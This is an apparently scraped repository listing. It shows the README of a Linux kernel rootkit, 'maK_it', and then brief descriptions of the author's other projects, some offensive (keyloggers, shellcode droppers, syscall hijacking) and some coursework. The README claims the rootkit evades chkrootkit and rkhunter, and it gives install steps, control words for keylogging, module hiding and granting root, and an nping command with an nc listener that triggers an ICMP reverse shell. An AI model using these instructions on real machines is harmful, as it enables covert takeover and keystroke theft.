maK-/maK_it-Linux-Rootkit

Stars
166
Rank 220,335 (Top 5 %)
Language
C
License
GNU General Publi...
Created almost 10 years ago
Updated over 4 years ago

maK-/maK_it-Linux-Rootkit

maK-

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

This is a linux rootkit using many of the techniques described on

maK_it-Linux-Rootkit

========================

This is a simple rootkit implementation for the project described at the following location

https://web.archive.org/web/20190119045332/https://r00tkit.me/

This rootkit avoids both the chkrootkit & rkhunter scanners as intended.

It is fully compatible with the latest version of CentOS 6.5

To run simply run "make" in the folder with the Makefile.

install with insmod maK_it.ko

Remove with rmmod maK_it

=============== Demo Commands

Echo any of the following into /dev/.maK_it

debug - turn /var/log/messages debug messages on or off.

keyLogOn - turn the keylogger on

keyLogOff - turn the keylogger off

modHide - hide the module (hidden by default in insmod)

modReveal - reveal the module (so you can rmmod it)

rootMe - give root privileges to user

shellUp - Turn on a packet sniffer for reverse shell icmp

shellDown - Turn off the packet sniffer daemon

To trigger the reverse shell, listen on a port of your choice on your own machine. The shell will be returned if you send an icmp packet with the right trigger word, your ip/port.

Example: nping --icmp -c 1 -dest-ip 127.0.0.1 --data-string 'maK_it_$H3LL 127.0.0.1 31337'

A port listener can be simply opened on your machine using nc -l 31337

parameth

This tool can be used to brute discover GET and POST parameters

scantastic-tool

It's bloody scantastic

reverse-shell-access-kernel-module

This is a kernel module invoked reverse shell proof of concept.

scanomaly-2years

This is a web application fuzzer scanner - the goal was CLI flexibility and rapid prototyping

Keylogger-lkm

This is a very simple Keylogger, it doesn't hide itself and is a college project building towards developing a rootkit.

Syscall-table-hijack-LKM

This demonstrates the hijacking of the "write" system call and how to set the System Call table to read/write mode via modifying the correct cr0 bit.

scanomaly

Generic plugin based web application security fuzzing for anomalies by Slándáil Research Limited

Xssive

Xss Vulnerability Demonstration framework.

stealthy-Keylogger-lkm

This is a stealthier version of Keylogger-lkm, it introduces hiding techniques and also a command entering option.

SimplestLKM

Hello World Linux Kernel Module

systemtap-rootkit-project-scripts

This is a repository to hold various scripts and proof of concept code for my final year college project. A Linux rootkit.

fearann

This permutates and fucks with subdomains hard

domaination

This is a very simple/stupid cli tool for doing various things with subdomain lists

mistRust

Learning rust via implementing some stupid simple shellcode droppers

rss2irc-bot

A simple bot that prints user specified rss feeds into an Irc channel of choice.

Digital-Signature-ElGamal

Implementing a Digital signature using the ElGamal signature scheme. (Crypto Assignment 2)

Naive-Concurrent-Elevator

Simple naive consumer-producer type solution to the Elevator problem.

Code-Dump

miscellaneous small things

Imageroll

This project Died.

rpliy

Raspberry pi python web player -

Crypto-File-Tool

This was developed to meet the specific requirements of the first assigment in my Cryptography module.

Single-file-server

an ad-hoc single file webserver that allows a count to be added on how many times the file can be downloaded.

Simple-Qlearning-XOs

Expressing Naughts & Crosses as a Simple Reinforcement Learning problem.